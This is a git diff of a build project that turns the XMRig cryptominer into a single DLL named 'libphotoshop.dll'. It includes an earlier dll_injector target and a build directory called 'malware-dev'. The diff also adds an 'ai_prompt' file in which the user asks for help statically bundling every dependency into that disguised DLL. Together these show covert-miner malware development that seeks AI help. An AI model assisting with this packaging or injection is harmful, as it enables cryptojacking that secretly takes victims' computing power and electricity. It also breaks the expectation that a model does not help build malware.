diff --git a/CMakeLists.txt b/CMakeLists.txt index a759907f..5dc4c1f9 100644 --- a/CMakeLists.txt +++ b/CMakeLists.txt @@ -1,54 +1,51 @@ cmake_minimum_required(VERSION 3.10) project(photoshop) -option(WITH_HWLOC "Enable hwloc support" ON) -option(WITH_CN_LITE "Enable CryptoNight-Lite algorithms family" ON) -option(WITH_CN_HEAVY "Enable CryptoNight-Heavy algorithms family" ON) -option(WITH_CN_PICO "Enable CryptoNight-Pico algorithm" ON) -option(WITH_CN_FEMTO "Enable CryptoNight-UPX2 algorithm" ON) -option(WITH_RANDOMX "Enable RandomX algorithms family" ON) -option(WITH_ARGON2 "Enable Argon2 algorithms family" ON) -option(WITH_KAWPOW "Enable KawPow algorithms family" ON) -option(WITH_GHOSTRIDER "Enable GhostRider algorithm" ON) -option(WITH_HTTP "Enable HTTP protocol support (client/server)" ON) -option(WITH_DEBUG_LOG "Enable debug log output" OFF) -option(WITH_TLS "Enable OpenSSL support" ON) -option(WITH_ASM "Enable ASM PoW implementations" ON) -option(WITH_MSR "Enable MSR mod & 1st-gen Ryzen fix" ON) -option(WITH_ENV_VARS "Enable environment variables support in config file" OFF) -option(WITH_EMBEDDED_CONFIG "Enable internal embedded JSON config" ON) -option(WITH_OPENCL "Enable OpenCL backend" OFF) +option(WITH_HWLOC "Enable hwloc support" ON) +option(WITH_CN_LITE "Enable CryptoNight-Lite algorithms family" ON) +option(WITH_CN_HEAVY "Enable CryptoNight-Heavy algorithms family" ON) +option(WITH_CN_PICO "Enable CryptoNight-Pico algorithm" ON) +option(WITH_CN_FEMTO "Enable CryptoNight-UPX2 algorithm" ON) +option(WITH_RANDOMX "Enable RandomX algorithms family" ON) +option(WITH_ARGON2 "Enable Argon2 algorithms family" ON) +option(WITH_KAWPOW "Enable KawPow algorithms family" ON) +option(WITH_GHOSTRIDER "Enable GhostRider algorithm" ON) +option(WITH_HTTP "Enable HTTP protocol support (client/server)" ON) +option(WITH_DEBUG_LOG "Enable debug log output" OFF) +option(WITH_TLS "Enable OpenSSL support" ON) +option(WITH_ASM "Enable ASM PoW implementations" ON) +option(WITH_MSR "Enable MSR mod & 1st-gen Ryzen fix" ON) +option(WITH_ENV_VARS "Enable environment variables support in config file" OFF) +option(WITH_EMBEDDED_CONFIG "Enable internal embedded JSON config" ON) +option(WITH_OPENCL "Enable OpenCL backend" OFF) set(WITH_OPENCL_VERSION 200 CACHE STRING "Target OpenCL version") set_property(CACHE WITH_OPENCL_VERSION PROPERTY STRINGS 120 200 210 220) -option(WITH_CUDA "Enable CUDA backend" OFF) -option(WITH_NVML "Enable NVML (NVIDIA Management Library) support (only if CUDA backend enabled)" OFF) -option(WITH_ADL "Enable ADL (AMD Display Library) or sysfs support (only if OpenCL backend enabled)" OFF) -option(WITH_STRICT_CACHE "Enable strict checks for OpenCL cache" ON) +option(WITH_CUDA "Enable CUDA backend" OFF) +option(WITH_NVML "Enable NVML (NVIDIA Management Library) support (only if CUDA backend enabled)" OFF) +option(WITH_ADL "Enable ADL (AMD Display Library) or sysfs support (only if OpenCL backend enabled)" OFF) +option(WITH_STRICT_CACHE "Enable strict checks for OpenCL cache" ON) option(WITH_INTERLEAVE_DEBUG_LOG "Enable debug log for threads interleave" OFF) -option(WITH_PROFILING "Enable profiling for developers" OFF) -option(WITH_SSE4_1 "Enable SSE 4.1 for Blake2" ON) -option(WITH_AVX2 "Enable AVX2 for Blake2" ON) -option(WITH_VAES "Enable VAES instructions for Cryptonight" ON) -option(WITH_BENCHMARK "Enable builtin RandomX benchmark and stress test" OFF) -option(WITH_SECURE_JIT "Enable secure access to JIT memory" OFF) -option(WITH_DMI "Enable DMI/SMBIOS reader" ON) - -option(BUILD_STATIC "Build static binary" OFF) -option(ARM_V8 "Force ARMv8 (64 bit) architecture, use with caution if automatic detection fails, but you sure it may work" OFF) -option(ARM_V7 "Force ARMv7 (32 bit) architecture, use with caution if automatic detection fails, but you sure it may work" OFF) -option(HWLOC_DEBUG "Enable hwloc debug helpers and log" OFF) +option(WITH_PROFILING "Enable profiling for developers" OFF) +option(WITH_SSE4_1 "Enable SSE 4.1 for Blake2" ON) +option(WITH_AVX2 "Enable AVX2 for Blake2" ON) +option(WITH_VAES "Enable VAES instructions for Cryptonight" ON) +option(WITH_BENCHMARK "Enable builtin RandomX benchmark and stress test" OFF) +option(WITH_SECURE_JIT "Enable secure access to JIT memory" OFF) +option(WITH_DMI "Enable DMI/SMBIOS reader" ON) +option(BUILD_STATIC "Build static binary" OFF) +option(ARM_V8 "Force ARMv8 (64 bit) architecture, use with caution if automatic detection fails, but you sure it may work" OFF) +option(ARM_V7 "Force ARMv7 (32 bit) architecture, use with caution if automatic detection fails, but you sure it may work" OFF) +option(HWLOC_DEBUG "Enable hwloc debug helpers and log" OFF) set(CMAKE_MODULE_PATH ${CMAKE_MODULE_PATH} "${CMAKE_SOURCE_DIR}/cmake") - include (CheckIncludeFile) include (cmake/cpu.cmake) include (cmake/os.cmake) include (src/base/base.cmake) include (src/backend/backend.cmake) - set(HEADERS "${HEADERS_BASE}" "${HEADERS_BASE_HTTP}" @@ -58,7 +55,7 @@ set(HEADERS #src/core/config/Config_platform.h src/core/config/Config.h #src/core/config/ConfigTransform.h - #src/core/config/usage.h + # src/core/config/usage.h <-- REMOVED src/core/Controller.h src/core/Miner.h src/core/Taskbar.h @@ -148,7 +145,6 @@ if (WITH_HWLOC) list(APPEND HEADERS_CRYPTO src/crypto/common/NUMAMemoryPool.h ) - list(APPEND SOURCES_CRYPTO src/crypto/common/NUMAMemoryPool.cpp src/crypto/common/VirtualMemory_hwloc.cpp @@ -157,18 +153,16 @@ endif() if (XMRIG_OS_WIN) list(APPEND SOURCES_OS - res/app.rc + # res/app.rc <-- REMOVED src/App_win.cpp src/crypto/common/VirtualMemory_win.cpp ) - - set(EXTRA_LIBS ws2_32 psapi iphlpapi userenv dbghelp) + set(EXTRA_LIBS ws2_32 psapi iphlpapi userenv dbghelp crypt32) elseif (XMRIG_OS_APPLE) list(APPEND SOURCES_OS src/App_unix.cpp src/crypto/common/VirtualMemory_unix.cpp ) - find_library(IOKIT_LIBRARY IOKit) find_library(CORESERVICES_LIBRARY CoreServices) set(EXTRA_LIBS ${IOKIT_LIBRARY} ${CORESERVICES_LIBRARY}) @@ -177,7 +171,6 @@ else() src/App_unix.cpp src/crypto/common/VirtualMemory_unix.cpp ) - if (XMRIG_OS_ANDROID) set(EXTRA_LIBS pthread rt dl log) elseif (XMRIG_OS_LINUX) @@ -185,7 +178,6 @@ else() src/crypto/common/LinuxMemory.h src/crypto/common/LinuxMemory.cpp ) - set(EXTRA_LIBS pthread rt dl) elseif (XMRIG_OS_FREEBSD) set(EXTRA_LIBS kvm pthread) @@ -205,38 +197,18 @@ include(cmake/ghostrider.cmake) include(cmake/OpenSSL.cmake) include(cmake/asm.cmake) -# OpenCL dynamic compilation -#find_package(OpenCL) -#if (OPENCL_FOUND) -# add_definitions(/DXMRIG_FEATURE_OPENCL /DCL_USE_DEPRECATED_OPENCL_1_2_APIS) -# include(src/backend/opencl/opencl.cmake) -# target_link_libraries(${CMAKE_PROJECT_NAME} ${OPENCL_LIBRARIES}) -#endif() - -# CUDA dynamic compilation -#find_package(CUDA) -#if (CUDA_FOUND) -# add_definitions(/DXMRIG_FEATURE_CUDA) -# include(src/backend/cuda/cuda.cmake) -# target_link_libraries(${CMAKE_PROJECT_NAME} ${CUDA_LIBRARIES}) -#endif() - if (WITH_CN_LITE) add_definitions(/DXMRIG_ALGO_CN_LITE) endif() - if (WITH_CN_HEAVY) add_definitions(/DXMRIG_ALGO_CN_HEAVY) endif() - if (WITH_CN_PICO) add_definitions(/DXMRIG_ALGO_CN_PICO) endif() - if (WITH_CN_FEMTO) add_definitions(/DXMRIG_ALGO_CN_FEMTO) endif() - if (WITH_EMBEDDED_CONFIG) add_definitions(/DXMRIG_FEATURE_EMBEDDED_CONFIG) endif() @@ -253,28 +225,44 @@ if (WITH_DEBUG_LOG) endif() add_library(${CMAKE_PROJECT_NAME} SHARED ${HEADERS} ${SOURCES} ${SOURCES_OS} ${HEADERS_CRYPTO} ${SOURCES_CRYPTO} ${SOURCES_SYSLOG} ${TLS_SOURCES} ${XMRIG_ASM_SOURCES}) -add_executable(injector ./dll_injector.cpp) -#add_executable(${CMAKE_PROJECT_NAME} ${HEADERS} ${SOURCES} ${SOURCES_OS} ${HEADERS_CRYPTO} ${SOURCES_CRYPTO} ${SOURCES_SYSLOG} ${TLS_SOURCES} ${XMRIG_ASM_SOURCES}) -target_link_libraries(${CMAKE_PROJECT_NAME} ${XMRIG_ASM_LIBRARY} ${OPENSSL_LIBRARIES} ${UV_LIBRARIES} ${EXTRA_LIBS} ${CPUID_LIB} ${ARGON2_LIBRARY} ${ETHASH_LIBRARY} ${GHOSTRIDER_LIBRARY} pthread) -target_link_libraries(injector psapi ntdll) -target_link_options(${CMAKE_PROJECT_NAME} PRIVATE -static-libgcc -static-libstdc++ -static) +# --- FIXED LINKING BLOCK --- if (WIN32) - target_link_options(${CMAKE_PROJECT_NAME} PRIVATE -mwindows) + target_link_libraries(${CMAKE_PROJECT_NAME} + # 1. Static Libraries + ${XMRIG_ASM_LIBRARY} + ${OPENSSL_LIBRARIES} + ${UV_LIBRARIES} + ${CPUID_LIB} + ${ARGON2_LIBRARY} + ${ETHASH_LIBRARY} + ${GHOSTRIDER_LIBRARY} + + # 2. Force Static Runtimes (Flags) + -static-libgcc + -static-libstdc++ + -Wl,-Bstatic + + # 3. Force Static Pthreads (Whole Archive) + -Wl,--whole-archive -lwinpthread -Wl,--no-whole-archive + + # 4. Force MSVCRT + -lmsvcrt + + # 5. System Libraries (Dynamic) + -Wl,-Bdynamic + ${EXTRA_LIBS} + ) +else() + target_link_libraries(${CMAKE_PROJECT_NAME} ${XMRIG_ASM_LIBRARY} ${OPENSSL_LIBRARIES} ${UV_LIBRARIES} ${EXTRA_LIBS} ${CPUID_LIB} ${ARGON2_LIBRARY} ${ETHASH_LIBRARY} ${GHOSTRIDER_LIBRARY}) endif() +# --------------------------- if (WIN32) if (NOT ARM_TARGET) add_custom_command(TARGET ${CMAKE_PROJECT_NAME} POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy_if_different "${CMAKE_SOURCE_DIR}/bin/WinRing0/WinRing0x64.sys" $) endif() - #add_custom_command(TARGET ${CMAKE_PROJECT_NAME} POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy_if_different "${CMAKE_SOURCE_DIR}/scripts/benchmark_1M.cmd" $) - #add_custom_command(TARGET ${CMAKE_PROJECT_NAME} POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy_if_different "${CMAKE_SOURCE_DIR}/scripts/benchmark_10M.cmd" $) - #add_custom_command(TARGET ${CMAKE_PROJECT_NAME} POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy_if_different "${CMAKE_SOURCE_DIR}/scripts/pool_mine_example.cmd" $) - #add_custom_command(TARGET ${CMAKE_PROJECT_NAME} POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy_if_different "${CMAKE_SOURCE_DIR}/scripts/solo_mine_example.cmd" $) - #add_custom_command(TARGET ${CMAKE_PROJECT_NAME} POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy_if_different "${CMAKE_SOURCE_DIR}/scripts/rtm_ghostrider_example.cmd" $) -endif() -set(CMAKE_CXX_FLAGS_RELEASE "${CMAKE_CXX_FLAGS_RELEASE} -s") if (CMAKE_CXX_COMPILER_ID MATCHES Clang AND CMAKE_BUILD_TYPE STREQUAL Release AND NOT CMAKE_GENERATOR STREQUAL Xcode) add_custom_command(TARGET ${PROJECT_NAME} POST_BUILD COMMAND ${CMAKE_STRIP} "$") endif() diff --git a/ai_prompt b/ai_prompt new file mode 100644 index 00000000..c78b4908 --- /dev/null +++ b/ai_prompt @@ -0,0 +1,1003 @@ + /opt/llvm-mingw/bin/x86_64-w64-mingw32-objdump -p test_xmrig.exe | grep DLL && /opt/llvm-mingw/bin/x86_64-w64-mingw32-objdump -p libphotoshop.dll | grep DLL + DLL Name: KERNEL32.dll + DLL Name: api-ms-win-crt-environment-l1-1-0.dll + DLL Name: api-ms-win-crt-heap-l1-1-0.dll + DLL Name: api-ms-win-crt-locale-l1-1-0.dll + DLL Name: api-ms-win-crt-math-l1-1-0.dll + DLL Name: api-ms-win-crt-private-l1-1-0.dll + DLL Name: api-ms-win-crt-runtime-l1-1-0.dll + DLL Name: api-ms-win-crt-stdio-l1-1-0.dll + DLL Name: api-ms-win-crt-string-l1-1-0.dll + DLL Name: libstdc++-6.dll + DLL + DLL Name: WS2_32.dll + DLL Name: KERNEL32.dll + DLL Name: USER32.dll + DLL Name: ole32.dll + DLL Name: ADVAPI32.dll + DLL Name: api-ms-win-crt-stdio-l1-1-0.dll + DLL Name: api-ms-win-crt-runtime-l1-1-0.dll + DLL Name: api-ms-win-crt-string-l1-1-0.dll + DLL Name: api-ms-win-crt-time-l1-1-0.dll + DLL Name: api-ms-win-crt-math-l1-1-0.dll + DLL Name: api-ms-win-crt-heap-l1-1-0.dll + DLL Name: api-ms-win-crt-environment-l1-1-0.dll + DLL Name: api-ms-win-crt-private-l1-1-0.dll + DLL Name: api-ms-win-crt-utility-l1-1-0.dll + DLL Name: api-ms-win-crt-convert-l1-1-0.dll + DLL Name: api-ms-win-crt-filesystem-l1-1-0.dll + DLL Name: IPHLPAPI.DLL + DLL Name: USERENV.dll + DLL Name: api-ms-win-crt-locale-l1-1-0.dll + DLL Name: api-ms-win-crt-multibyte-l1-1-0.dll + DLL Name: CRYPT32.dll + DLL Name: dbghelp.dll + DLL Name: SHELL32.dll + DLL name: libphotoshop.dll + +These are the external dlls my exe and dll rely on. I dont want to have them seperate and i just want to have them inside my dll +/usr/lib/libstdc++.a +/usr/lib/gcc/x86_64-w64-mingw32/15.2.0/libgcc.a +/opt/llvm-mingw/x86_64-w64-mingw32/lib/libwinpthread.a + +Command im using to build + +cmake -G Ninja .. \ + -DCMAKE_BUILD_TYPE=Release \ + -DCMAKE_SYSTEM_NAME=Windows \ + -DCMAKE_C_COMPILER=/opt/llvm-mingw/bin/x86_64-w64-mingw32-clang \ + -DCMAKE_CXX_COMPILER=/opt/llvm-mingw/bin/x86_64-w64-mingw32-clang++ \ + -DCMAKE_RC_COMPILER=/opt/llvm-mingw/bin/x86_64-w64-mingw32-windres \ + -DXMRIG_DEPS=$HOME/xmrig-deps/gcc/x64 \ + -DWITH_TLS=ON \ + -DWITH_EMBEDDED_CONFIG=ON + ninja -j10 + +x86_64-w64-mingw32-g++ -o test_xmrig.exe ../test_xmrig.cpp libphotoshop.dll + +this is my CMakeLists.txt file +cmake_minimum_required(VERSION 3.10) +project(xmrig) + +option(WITH_HWLOC "Enable hwloc support" ON) +option(WITH_CN_LITE "Enable CryptoNight-Lite algorithms family" ON) +option(WITH_CN_HEAVY "Enable CryptoNight-Heavy algorithms family" ON) +option(WITH_CN_PICO "Enable CryptoNight-Pico algorithm" ON) +option(WITH_CN_FEMTO "Enable CryptoNight-UPX2 algorithm" ON) +option(WITH_RANDOMX "Enable RandomX algorithms family" ON) +option(WITH_ARGON2 "Enable Argon2 algorithms family" ON) +option(WITH_KAWPOW "Enable KawPow algorithms family" ON) +option(WITH_GHOSTRIDER "Enable GhostRider algorithm" ON) +option(WITH_HTTP "Enable HTTP protocol support (client/server)" ON) +option(WITH_DEBUG_LOG "Enable debug log output" OFF) +option(WITH_TLS "Enable OpenSSL support" ON) +option(WITH_ASM "Enable ASM PoW implementations" ON) +option(WITH_MSR "Enable MSR mod & 1st-gen Ryzen fix" ON) +option(WITH_ENV_VARS "Enable environment variables support in config file" ON) +option(WITH_EMBEDDED_CONFIG "Enable internal embedded JSON config" OFF) +option(WITH_OPENCL "Enable OpenCL backend" ON) +set(WITH_OPENCL_VERSION 200 CACHE STRING "Target OpenCL version") +set_property(CACHE WITH_OPENCL_VERSION PROPERTY STRINGS 120 200 210 220) +option(WITH_CUDA "Enable CUDA backend" ON) +option(WITH_NVML "Enable NVML (NVIDIA Management Library) support (only if CUDA backend enabled)" ON) +option(WITH_ADL "Enable ADL (AMD Display Library) or sysfs support (only if OpenCL backend enabled)" ON) +option(WITH_STRICT_CACHE "Enable strict checks for OpenCL cache" ON) +option(WITH_INTERLEAVE_DEBUG_LOG "Enable debug log for threads interleave" OFF) +option(WITH_PROFILING "Enable profiling for developers" OFF) +option(WITH_SSE4_1 "Enable SSE 4.1 for Blake2" ON) +option(WITH_AVX2 "Enable AVX2 for Blake2" ON) +option(WITH_VAES "Enable VAES instructions for Cryptonight" ON) +option(WITH_BENCHMARK "Enable builtin RandomX benchmark and stress test" ON) +option(WITH_SECURE_JIT "Enable secure access to JIT memory" OFF) +option(WITH_DMI "Enable DMI/SMBIOS reader" ON) + +option(BUILD_STATIC "Build static binary" ON) +option(ARM_V8 "Force ARMv8 (64 bit) architecture, use with caution if automatic detection fails, but you sure it may work" OFF) +option(ARM_V7 "Force ARMv7 (32 bit) architecture, use with caution if automatic detection fails, but you sure it may work" OFF) +option(HWLOC_DEBUG "Enable hwloc debug helpers and log" OFF) + + +set(CMAKE_MODULE_PATH ${CMAKE_MODULE_PATH} "${CMAKE_SOURCE_DIR}/cmake") + + +include (CheckIncludeFile) +include (cmake/cpu.cmake) +include (cmake/os.cmake) +include (src/base/base.cmake) +include (src/backend/backend.cmake) + + +set(HEADERS + "${HEADERS_BASE}" + "${HEADERS_BASE_HTTP}" + "${HEADERS_BACKEND}" + src/App.h + src/core/config/Config_default.h + src/core/config/Config_platform.h + src/core/config/Config.h + src/core/config/ConfigTransform.h + src/core/config/usage.h + src/core/Controller.h + src/core/Miner.h + src/core/Taskbar.h + src/net/interfaces/IJobResultListener.h + src/net/JobResult.h + src/net/JobResults.h + src/net/Network.h + src/net/strategies/DonateStrategy.h + src/Summary.h + src/version.h + ) + +set(HEADERS_CRYPTO + src/backend/common/interfaces/IMemoryPool.h + src/crypto/cn/asm/CryptonightR_template.h + src/crypto/cn/c_blake256.h + src/crypto/cn/c_groestl.h + src/crypto/cn/c_jh.h + src/crypto/cn/c_skein.h + src/crypto/cn/CnAlgo.h + src/crypto/cn/CnCtx.h + src/crypto/cn/CnHash.h + src/crypto/cn/CryptoNight_monero.h + src/crypto/cn/CryptoNight_test.h + src/crypto/cn/CryptoNight.h + src/crypto/cn/groestl_tables.h + src/crypto/cn/hash.h + src/crypto/cn/skein_port.h + src/crypto/cn/soft_aes.h + src/crypto/common/HugePagesInfo.h + src/crypto/common/MemoryPool.h + src/crypto/common/Nonce.h + src/crypto/common/portable/mm_malloc.h + src/crypto/common/VirtualMemory.h + ) + +if (XMRIG_ARM) + set(HEADERS_CRYPTO "${HEADERS_CRYPTO}" src/crypto/cn/CryptoNight_arm.h) +else() + set(HEADERS_CRYPTO "${HEADERS_CRYPTO}" src/crypto/cn/CryptoNight_x86.h) +endif() + +set(SOURCES + "${SOURCES_BASE}" + "${SOURCES_BASE_HTTP}" + "${SOURCES_BACKEND}" + src/App.cpp + src/core/config/Config.cpp + src/core/config/ConfigTransform.cpp + src/core/Controller.cpp + src/core/Miner.cpp + src/core/Taskbar.cpp + src/net/JobResults.cpp + src/net/Network.cpp + src/net/strategies/DonateStrategy.cpp + src/Summary.cpp + src/xmrig.cpp + ) + +set(SOURCES_CRYPTO + src/crypto/cn/c_blake256.c + src/crypto/cn/c_groestl.c + src/crypto/cn/c_jh.c + src/crypto/cn/c_skein.c + src/crypto/cn/CnCtx.cpp + src/crypto/cn/CnHash.cpp + src/crypto/common/HugePagesInfo.cpp + src/crypto/common/MemoryPool.cpp + src/crypto/common/Nonce.cpp + src/crypto/common/VirtualMemory.cpp + ) + +if (CMAKE_C_COMPILER_ID MATCHES GNU) + set_source_files_properties(src/crypto/cn/CnHash.cpp PROPERTIES COMPILE_FLAGS "-Ofast -fno-tree-vectorize") +endif() + +if (WITH_VAES) + add_definitions(-DXMRIG_VAES) + set(HEADERS_CRYPTO "${HEADERS_CRYPTO}" src/crypto/cn/CryptoNight_x86_vaes.h) + set(SOURCES_CRYPTO "${SOURCES_CRYPTO}" src/crypto/cn/CryptoNight_x86_vaes.cpp) + if (CMAKE_C_COMPILER_ID MATCHES GNU OR CMAKE_C_COMPILER_ID MATCHES Clang) + set_source_files_properties(src/crypto/cn/CryptoNight_x86_vaes.cpp PROPERTIES COMPILE_FLAGS "-Ofast -fno-tree-vectorize -mavx2 -mvaes") + endif() +endif() + +if (WITH_HWLOC) + list(APPEND HEADERS_CRYPTO + src/crypto/common/NUMAMemoryPool.h + ) + + list(APPEND SOURCES_CRYPTO + src/crypto/common/NUMAMemoryPool.cpp + src/crypto/common/VirtualMemory_hwloc.cpp + ) +endif() + +if (XMRIG_OS_WIN) + list(APPEND SOURCES_OS + res/app.rc + src/App_win.cpp + src/crypto/common/VirtualMemory_win.cpp + ) + + set(EXTRA_LIBS ws2_32 psapi iphlpapi userenv dbghelp) +elseif (XMRIG_OS_APPLE) + list(APPEND SOURCES_OS + src/App_unix.cpp + src/crypto/common/VirtualMemory_unix.cpp + ) + + find_library(IOKIT_LIBRARY IOKit) + find_library(CORESERVICES_LIBRARY CoreServices) + set(EXTRA_LIBS ${IOKIT_LIBRARY} ${CORESERVICES_LIBRARY}) +else() + list(APPEND SOURCES_OS + src/App_unix.cpp + src/crypto/common/VirtualMemory_unix.cpp + ) + + if (XMRIG_OS_ANDROID) + set(EXTRA_LIBS pthread rt dl log) + elseif (XMRIG_OS_LINUX) + list(APPEND SOURCES_OS + src/crypto/common/LinuxMemory.h + src/crypto/common/LinuxMemory.cpp + ) + + set(EXTRA_LIBS pthread rt dl) + elseif (XMRIG_OS_FREEBSD) + set(EXTRA_LIBS kvm pthread) + endif() +endif() + +add_definitions(-DXMRIG_MINER_PROJECT -DXMRIG_JSON_SINGLE_LINE_ARRAY) +add_definitions(-D__STDC_FORMAT_MACROS -DUNICODE -D_FILE_OFFSET_BITS=64) + +find_package(UV REQUIRED) + +include(cmake/flags.cmake) +include(cmake/randomx.cmake) +include(cmake/argon2.cmake) +include(cmake/kawpow.cmake) +include(cmake/ghostrider.cmake) +include(cmake/OpenSSL.cmake) +include(cmake/asm.cmake) + +if (WITH_CN_LITE) + add_definitions(/DXMRIG_ALGO_CN_LITE) +endif() + +if (WITH_CN_HEAVY) + add_definitions(/DXMRIG_ALGO_CN_HEAVY) +endif() + +if (WITH_CN_PICO) + add_definitions(/DXMRIG_ALGO_CN_PICO) +endif() + +if (WITH_CN_FEMTO) + add_definitions(/DXMRIG_ALGO_CN_FEMTO) +endif() + +if (WITH_EMBEDDED_CONFIG) + add_definitions(/DXMRIG_FEATURE_EMBEDDED_CONFIG) +endif() + +include(src/hw/api/api.cmake) +include(src/hw/dmi/dmi.cmake) + +include_directories(src) +include_directories(src/3rdparty) +include_directories(${UV_INCLUDE_DIR}) + +if (WITH_DEBUG_LOG) + add_definitions(/DAPP_DEBUG) +endif() + +add_library(${CMAKE_PROJECT_NAME} SHARED ${HEADERS} ${SOURCES} ${SOURCES_OS} ${HEADERS_CRYPTO} ${SOURCES_CRYPTO} ${SOURCES_SYSLOG} ${TLS_SOURCES} ${XMRIG_ASM_SOURCES}) +#add_executable(${CMAKE_PROJECT_NAME} ${HEADERS} ${SOURCES} ${SOURCES_OS} ${HEADERS_CRYPTO} ${SOURCES_CRYPTO} ${SOURCES_SYSLOG} ${TLS_SOURCES} ${XMRIG_ASM_SOURCES}) +target_link_libraries(${CMAKE_PROJECT_NAME} ${XMRIG_ASM_LIBRARY} ${OPENSSL_LIBRARIES} ${UV_LIBRARIES} ${EXTRA_LIBS} ${CPUID_LIB} ${ARGON2_LIBRARY} ${ETHASH_LIBRARY} ${GHOSTRIDER_LIBRARY}) + +if (WIN32) + if (NOT ARM_TARGET) + add_custom_command(TARGET ${CMAKE_PROJECT_NAME} POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy_if_different "${CMAKE_SOURCE_DIR}/bin/WinRing0/WinRing0x64.sys" $) + endif() + + add_custom_command(TARGET ${CMAKE_PROJECT_NAME} POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy_if_different "${CMAKE_SOURCE_DIR}/scripts/benchmark_1M.cmd" $) + #add_custom_command(TARGET ${CMAKE_PROJECT_NAME} POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy_if_different "${CMAKE_SOURCE_DIR}/scripts/benchmark_10M.cmd" $) + #add_custom_command(TARGET ${CMAKE_PROJECT_NAME} POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy_if_different "${CMAKE_SOURCE_DIR}/scripts/pool_mine_example.cmd" $) + #add_custom_command(TARGET ${CMAKE_PROJECT_NAME} POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy_if_different "${CMAKE_SOURCE_DIR}/scripts/solo_mine_example.cmd" $) + #add_custom_command(TARGET ${CMAKE_PROJECT_NAME} POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy_if_different "${CMAKE_SOURCE_DIR}/scripts/rtm_ghostrider_example.cmd" $) +endif() + +if (CMAKE_CXX_COMPILER_ID MATCHES Clang AND CMAKE_BUILD_TYPE STREQUAL Release AND NOT CMAKE_GENERATOR STREQUAL Xcode) + add_custom_command(TARGET ${PROJECT_NAME} POST_BUILD COMMAND ${CMAKE_STRIP} "$") +endif() + + + +This is from CMakeCache.txt + +# This is the CMakeCache file. +# For build in directory: /home/someone/malware-dev/xmrig-minimized-dll/build +# It was generated by CMake: /usr/bin/cmake +# You can edit this file to change values found and used by cmake. +# If you do not want to change any of the values, simply exit the editor. +# If you do want to change a value, simply edit, save, and exit the editor. +# The syntax for the file is as follows: +# KEY:TYPE=VALUE +# KEY is the name of a variable in the cache. +# TYPE is a hint to GUIs for the type of VALUE, DO NOT EDIT TYPE!. +# VALUE is the current value for the KEY. + +######################## +# EXTERNAL cache entries +######################## + +//Force ARMv7 (32 bit) architecture, use with caution if automatic +// detection fails, but you sure it may work +ARM_V7:BOOL=OFF + +//Force ARMv8 (64 bit) architecture, use with caution if automatic +// detection fails, but you sure it may work +ARM_V8:BOOL=OFF + +//Build static binary +BUILD_STATIC:BOOL=OFF + +//Path to a program. +CMAKE_ADDR2LINE:FILEPATH=/opt/llvm-mingw/bin/llvm-addr2line + +//Path to a program. +CMAKE_AR:FILEPATH=/opt/llvm-mingw/bin/x86_64-w64-mingw32-llvm-ar + +//ASM compiler +CMAKE_ASM_COMPILER:FILEPATH=/opt/llvm-mingw/bin/x86_64-w64-mingw32-clang + +//LLVM archiver +CMAKE_ASM_COMPILER_AR:FILEPATH=/opt/llvm-mingw/bin/x86_64-w64-mingw32-llvm-ar + +//`clang-scan-deps` dependency scanner +CMAKE_ASM_COMPILER_CLANG_SCAN_DEPS:FILEPATH=/opt/llvm-mingw/bin/x86_64-w64-mingw32-clang-scan-deps + +//Generate index for LLVM archive +CMAKE_ASM_COMPILER_RANLIB:FILEPATH=/opt/llvm-mingw/bin/x86_64-w64-mingw32-llvm-ranlib + +//Flags used by the ASM compiler during all build types. +CMAKE_ASM_FLAGS:STRING= + +//Flags used by the ASM compiler during DEBUG builds. +CMAKE_ASM_FLAGS_DEBUG:STRING=-g + +//Flags used by the ASM compiler during MINSIZEREL builds. +CMAKE_ASM_FLAGS_MINSIZEREL:STRING=-Os -DNDEBUG + +//Flags used by the ASM compiler during RELEASE builds. +CMAKE_ASM_FLAGS_RELEASE:STRING=-O3 -DNDEBUG + +//Flags used by the ASM compiler during RELWITHDEBINFO builds. +CMAKE_ASM_FLAGS_RELWITHDEBINFO:STRING=-O2 -g -DNDEBUG + +//Choose the type of build, options are: None Debug Release RelWithDebInfo +// MinSizeRel ... +CMAKE_BUILD_TYPE:STRING=Release + +//No help, variable specified on the command line. +CMAKE_CXX_COMPILER:UNINITIALIZED=/opt/llvm-mingw/bin/x86_64-w64-mingw32-clang++ + +//LLVM archiver +CMAKE_CXX_COMPILER_AR:FILEPATH=/opt/llvm-mingw/bin/x86_64-w64-mingw32-llvm-ar + +//`clang-scan-deps` dependency scanner +CMAKE_CXX_COMPILER_CLANG_SCAN_DEPS:FILEPATH=/opt/llvm-mingw/bin/x86_64-w64-mingw32-clang-scan-deps + +//Generate index for LLVM archive +CMAKE_CXX_COMPILER_RANLIB:FILEPATH=/opt/llvm-mingw/bin/x86_64-w64-mingw32-llvm-ranlib + +//Flags used by the CXX compiler during all build types. +CMAKE_CXX_FLAGS:STRING= + +//Flags used by the CXX compiler during DEBUG builds. +CMAKE_CXX_FLAGS_DEBUG:STRING=-g + +//Flags used by the CXX compiler during MINSIZEREL builds. +CMAKE_CXX_FLAGS_MINSIZEREL:STRING=-Os -DNDEBUG + +//Flags used by the CXX compiler during RELEASE builds. +CMAKE_CXX_FLAGS_RELEASE:STRING=-O3 -DNDEBUG + +//Flags used by the CXX compiler during RELWITHDEBINFO builds. +CMAKE_CXX_FLAGS_RELWITHDEBINFO:STRING=-O2 -g -DNDEBUG + +//Libraries linked by default with all C++ applications. +CMAKE_CXX_STANDARD_LIBRARIES:STRING=-lkernel32 -luser32 -lgdi32 -lwinspool -lshell32 -lole32 -loleaut32 -luuid -lcomdlg32 -ladvapi32 + +//No help, variable specified on the command line. +CMAKE_C_COMPILER:UNINITIALIZED=/opt/llvm-mingw/bin/x86_64-w64-mingw32-clang + +//LLVM archiver +CMAKE_C_COMPILER_AR:FILEPATH=/opt/llvm-mingw/bin/x86_64-w64-mingw32-llvm-ar + +//`clang-scan-deps` dependency scanner +CMAKE_C_COMPILER_CLANG_SCAN_DEPS:FILEPATH=/opt/llvm-mingw/bin/x86_64-w64-mingw32-clang-scan-deps + +//Generate index for LLVM archive 